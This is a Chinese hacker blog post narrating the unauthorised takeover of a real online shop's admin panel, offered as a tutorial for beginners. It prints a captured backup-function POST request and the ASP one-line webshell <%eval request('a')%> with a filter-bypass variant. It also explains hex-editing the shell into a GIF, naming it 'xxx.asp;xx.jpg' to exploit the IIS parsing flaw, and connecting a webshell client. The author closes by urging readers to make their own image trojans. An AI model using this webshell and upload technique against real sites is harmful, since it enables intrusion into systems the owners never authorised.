這篇文章有點(diǎn)標(biāo)題黨了，一句話木馬大家都不陌生，我想很多菜菜都體驗(yàn)過他的強(qiáng)大之處吧。提起一句話我們不由得想起了laker大俠啊?？梢哉flaker大俠的一句話木馬真是為我們廣大腳本入侵者帶來不少的方便。

        今天我要講述的這個(gè)入侵過程就和一句話木馬密不可分，說到這大家應(yīng)該都知道最終拿下這個(gè)站的的方法肯定是利用一句話了。不過這個(gè)站我還是費(fèi)了好大周折才成功拿下一句話的。下面讓我們一起回顧下整個(gè)過程吧。不會(huì)熟練使用一句話的小菜們可要認(rèn)真看了，能熟練運(yùn)用一句話的大蝦們也不要驕傲，說不定下面的方法就是你沒有嘗試過的哦。

        好了，事情起因還是以小菜拿到了網(wǎng)站后臺(tái)沒法拿webshell，找我求助來了，我們還是先到網(wǎng)站后臺(tái)看看到底是什么樣一個(gè)狀況吧。網(wǎng)址我就不發(fā)出來了，免得有些人品不好的小菜們拿去搞破壞。

        是一個(gè)什么電子商城的后臺(tái)，不過我之前在前臺(tái)看了下給人的感覺就是不怎么樣，剛那小菜應(yīng)該就是通過注入漏洞拿到的賬號(hào)和密碼。大約在后臺(tái)看了下基本情況，尋找可利用的信息，有一個(gè)ewebeditor的編輯器，不過貌似是2.16以上版本的，不存在注入漏洞；另外有一個(gè)圖片上傳的功能；還有一個(gè)數(shù)據(jù)庫備份恢復(fù)功能，大致這些地方都是可以利用的。不過ewebeditor我已經(jīng)嘗試了，默認(rèn)登錄界面刪除，數(shù)據(jù)庫名稱更改不可下載。admin_style.asp文件驗(yàn)證方式獨(dú)立，沒有與主站后臺(tái)使用同一種驗(yàn)證，有的網(wǎng)站的ewebeditor的后臺(tái)驗(yàn)證與網(wǎng)站后臺(tái)一直，這就導(dǎo)致登錄網(wǎng)站后臺(tái)后就可以直接訪問編輯器后臺(tái)程序。另外就是數(shù)據(jù)庫備份，大家可以看下圖：

        可見該備份功能不可自定義源數(shù)據(jù)庫路徑名稱及備份致的數(shù)數(shù)據(jù)庫路徑或名稱，不過當(dāng)時(shí)看到這里我心理面有了一個(gè)想法就是既然不可以自己定義路徑及名稱，我可以自己抓包然后更改數(shù)據(jù)庫后提交。這個(gè)方法我以前在其他網(wǎng)站上有試過，而且成功過。主要就是針對(duì)類似的數(shù)據(jù)庫備份功能，使用抓包工具抓下來然后更改后再用NC提交。經(jīng)過測試是可行的。這個(gè)方法以后又機(jī)會(huì)給大家單獨(dú)寫個(gè)文章出來，這次這里就不多說了。當(dāng)然這個(gè)網(wǎng)站也不一定能成功，我目的是要找到一個(gè)更方便的拿webshell的辦法，如果找到我認(rèn)為比這個(gè)更方便的辦法我肯定會(huì)先嘗試，如果不行我再來嘗試剛才的想法了。

        再繼續(xù)往下看有一個(gè)數(shù)據(jù)庫在線更名的功能：

        而且還建議我使用asp的后綴，這不是明擺著讓我拿webshell嗎？呵呵?。〔贿^當(dāng)時(shí)我在這里還是猶豫了一下，心想要是貿(mào)然的把數(shù)據(jù)庫更改成其他文件名了，一旦系統(tǒng)出錯(cuò)我有不知道原來的數(shù)據(jù)庫名，那不就全玩完兒？不過猶豫歸猶豫吧，我還是先看看利用這個(gè)功能拿webshell的前提條件吧。這個(gè)前提條件就是要找到數(shù)據(jù)庫路徑。當(dāng)然要找數(shù)據(jù)庫路徑的話在這里直接改名說不定系統(tǒng)就爆出數(shù)據(jù)庫路徑了，不過為了安全起見沒有十足把握還是不得冒然去更改數(shù)據(jù)庫名稱。

        接下來找數(shù)據(jù)庫路徑的辦法很簡單直接用上面說到的數(shù)據(jù)庫備份功能，然后抓包?。∥以谔摂M機(jī)上試了下，成功找到了數(shù)據(jù)庫路徑。捕獲到數(shù)據(jù)庫備份程序的數(shù)據(jù)包如下：

================================================================================
POST /admin/safe5.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxx.com/admin/safe5.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: www.xxxx.com
Content-Length: 87
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQCBSRCR=AMDHANDDDJGIMMMIGNELCGLF; buyok=temp=login&sql=&admin=mingdadz; ASPSESSIONIDQSBCTRDR=AEPLBLEDMNBOAIHMDMFIIBKP

oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdb&Submit=%B1%B8%B7%DD&backup=ok
================================================================================

        注意看最后的oldpath=這里..%2Fdata%2Fshopbackupd.asp就是網(wǎng)站當(dāng)前使用的數(shù)據(jù)庫路徑了，后面的&DBname=shopbackup.mdb就是備份后的數(shù)據(jù)庫路徑。當(dāng)前數(shù)據(jù)庫路徑中那個(gè)%2F就是“/”，所以數(shù)據(jù)庫路徑就是../data/shopbackupd.asp了，而當(dāng)前執(zhí)行的文件路徑在admin目錄下，“../”這個(gè)就表示上一級(jí)目錄！所以最終的數(shù)據(jù)庫路徑就是http://www.xxxxx.com/data/shopbackupd.asp了！好了數(shù)據(jù)庫路徑找到了，而且還是asp格式的，那現(xiàn)在拿webshell的思路又換了，就沒必要使用數(shù)據(jù)庫改名那個(gè)功能了，可以直接在后臺(tái)找個(gè)地方插入一句話木馬。說歸說，咱們還是先來看看數(shù)據(jù)庫情況吧，懷著激動(dòng)的心情直接訪問數(shù)據(jù)庫卻返回以下錯(cuò)誤！

        丫丫的，看來是管理員在數(shù)據(jù)庫中做了手腳，想讓ASP程序在數(shù)據(jù)庫中得不到正常的運(yùn)行，所以他在數(shù)據(jù)庫的最前面就搞一個(gè)ASP的錯(cuò)誤出來，這樣后面的ASP程序就得不到執(zhí)行了，那我們就算插入一句話，得不到執(zhí)行也是白搭啊。要想通過數(shù)據(jù)內(nèi)容的方法終結(jié)掉他這個(gè)錯(cuò)誤的話那幾乎是不可能的啊。我試過輸入%><%eval request("a")%>這樣的變形一句話都沒能終結(jié)掉他這個(gè)錯(cuò)誤?？磥磉@個(gè)拿webshell的思路及那個(gè)改名都要宣告失敗了。

        既然這樣那只好再尋他路了，這個(gè)時(shí)候還是想到利用數(shù)據(jù)庫備份哪里，想抓包更改數(shù)據(jù)包再NC提交，不過這個(gè)還是要有前提條件的啦，前提是要上傳一個(gè)圖片格式的木馬，然后再把數(shù)據(jù)包中源數(shù)據(jù)庫路徑替換成上傳的圖片馬，再把備份成的數(shù)據(jù)庫擴(kuò)展名更改成asp、asa、cer或者cdx等服務(wù)器可以執(zhí)行的格式。oldpath=..%2Fdata%2Fshopbackupd.asp&DBname=shopbackup.mdb也就是這部分，當(dāng)然更改之前要計(jì)算好數(shù)據(jù)包的大小。想到這里，那現(xiàn)在就要去找個(gè)上傳圖片的地方了，這個(gè)可容易多了，網(wǎng)站有直接上傳圖片的程序，而且還有個(gè)編輯器，可以說上傳圖片馬應(yīng)該是沒問題的了。

        之前我也看過他網(wǎng)站自帶的一個(gè)上傳圖片的程序，大約看了下沒什么可利用的，這次再次打開，然后上傳一個(gè)圖片馬。

        提示上傳成功了，點(diǎn)擊預(yù)覽上傳的文件看看，結(jié)果看到的確是一篇空白。

        丫丫的，杯具了。。。按理說上傳成功訪問應(yīng)該是一個(gè)圖片的X才對(duì)啊，怎么是一篇空白呢，我查看源碼也是一片空白。丫丫的，用這個(gè)不行咱換ewebeditor上傳圖片再試試，結(jié)果還是一片空白，我郁悶了。難道是給殺了？然后我上傳一個(gè)加密的asp馬也是，難道我加密的也給殺？接著我又換圖片里插入了一句話的上去也是一樣，都是空白，而我上傳正常的圖片卻沒問題。我插呀。。最終試了半天，總結(jié)出來了，是圖片里面帶有<%%>符號(hào)的傳上去都是空白。。。而不帶符號(hào)的傳上去都沒問題。。我插還讓不讓人活了？？？圖片木馬傳不上去就算那個(gè)抓包的數(shù)據(jù)庫備份能成功又有啥用呢。。誒。到這里我?guī)缀醵枷敕艞壛恕?/p>

        不過，就在我鼓搗這個(gè)上傳圖片地方的時(shí)候我偶然發(fā)現(xiàn)一個(gè)地方，很是讓我興奮！！看下圖：

        仔細(xì)看這兩個(gè)圖，上圖是上傳文件之前的截圖，下圖是上傳文件之后的截圖，發(fā)現(xiàn)有什么問題了嗎？哈哈，如果你沒發(fā)現(xiàn)讓我來告訴你，仔細(xì)看上圖中地址欄里面的地址，然后看下圖中文件上傳之后的路徑。發(fā)現(xiàn)了嗎？上圖中有個(gè)0325，下圖中圖片名稱就是0325，哈哈看到這里我也很興奮，難道是圖片的命名規(guī)則是根據(jù)上圖中fupnam的值來命名的？如果真要是這樣的話，那就可以利用IIS的解析漏洞了！為了驗(yàn)證我的想法，我吧路徑更愛成了這樣！然后上傳插入了一句話客戶端的圖片文件，注意紅線標(biāo)注的地方。

        提示成功上傳，見下圖：

        看到了嗎？多么淫蕩的一個(gè)圖片文件名啊。。。不過，在點(diǎn)擊預(yù)覽上傳文件的時(shí)候看到的圖片還是一片空白，我郁悶了。。。難道非要讓我如此杯具？？

        做到這里，幾乎又讓我進(jìn)入放棄的邊緣，經(jīng)過冷靜思考后決定從上傳的圖片入手。之前有看到過一個(gè)教程中使用的插入有一句話客戶端的圖片能正常顯示，而我自己的卻是不能正常顯示原圖的。貌似那個(gè)教程中有提到過說那個(gè)圖片是使用十六進(jìn)制編輯過的。難道是在十六進(jìn)制模式下插入的一句話客戶段？而我插入一句話客戶端的方式是直接用記事本打開圖片文件，然后在結(jié)尾處插入。

        經(jīng)過如此一分析，我決定死馬當(dāng)活馬醫(yī)了，先找了一個(gè)正常顯示的gif圖片，然后用C32十六進(jìn)制編輯，為了驗(yàn)證在十六進(jìn)制模式下編輯后圖片能正常顯示，我首先在結(jié)尾隨便插入了點(diǎn)內(nèi)容，然后保存圖片，查看圖片顯示正常。

        如此折騰一番后確定在十六進(jìn)制模式下編輯的圖片能正常顯示后，我就在最后直接寫上了一句話客戶端。然后再保存測試，依然正常顯示，并且我還將圖片名稱更改成xxx.asp;xx.jpg格式，然后放到我電腦的ASP運(yùn)行環(huán)境下測試，能正常使用一句話連接。

        不過在對(duì)用十六進(jìn)制編輯過后的圖片用記事本打開查看依然能看到直接的明文<%eval request("a")%>，上文說過，那個(gè)上傳圖片對(duì)圖片驗(yàn)證很嚴(yán)格，所有內(nèi)容當(dāng)中包含有<%%>符號(hào)的上傳上去后訪問都是空白。不知道這次能不能成功共呢。其實(shí)當(dāng)時(shí)也沒抱多大的希望上傳了使用十六進(jìn)制更改過的圖片。上傳成功后去訪問，這次圖片就老老實(shí)實(shí)的顯示出來了。

        緊接著就是讓laker的一句話連接段上場了，抄出我美化過的laker一句話連接段，填上地址密碼進(jìn)行連接。

        哈哈，看到了把，一句話成功的執(zhí)行了，接下來拿webshell那就是易如反掌的事情了，總的來說這次拿下這個(gè)站主要的方法還是一句話+IIS解析漏洞了。不過這個(gè)一句話只經(jīng)過特殊處理的哦，我想這個(gè)十六進(jìn)制編輯一句話圖片馬對(duì)高手來說應(yīng)該沒什么了，不過對(duì)小菜們來說應(yīng)該是一個(gè)很不錯(cuò)的技術(shù)啦。當(dāng)然我之前也不知道的，以前拿類似的站我都是用直接用記事本編輯的一句話圖片馬做的，這次遇上的還是頭一次啊。不過自己也有所收獲。至少我以后的一句話圖片馬都會(huì)使用十六進(jìn)制編輯過的，比之前用的肯定要高級(jí)點(diǎn)了。建議小菜們下來也自己做一個(gè)屬于自己的一句話圖片馬吧，很實(shí)用的。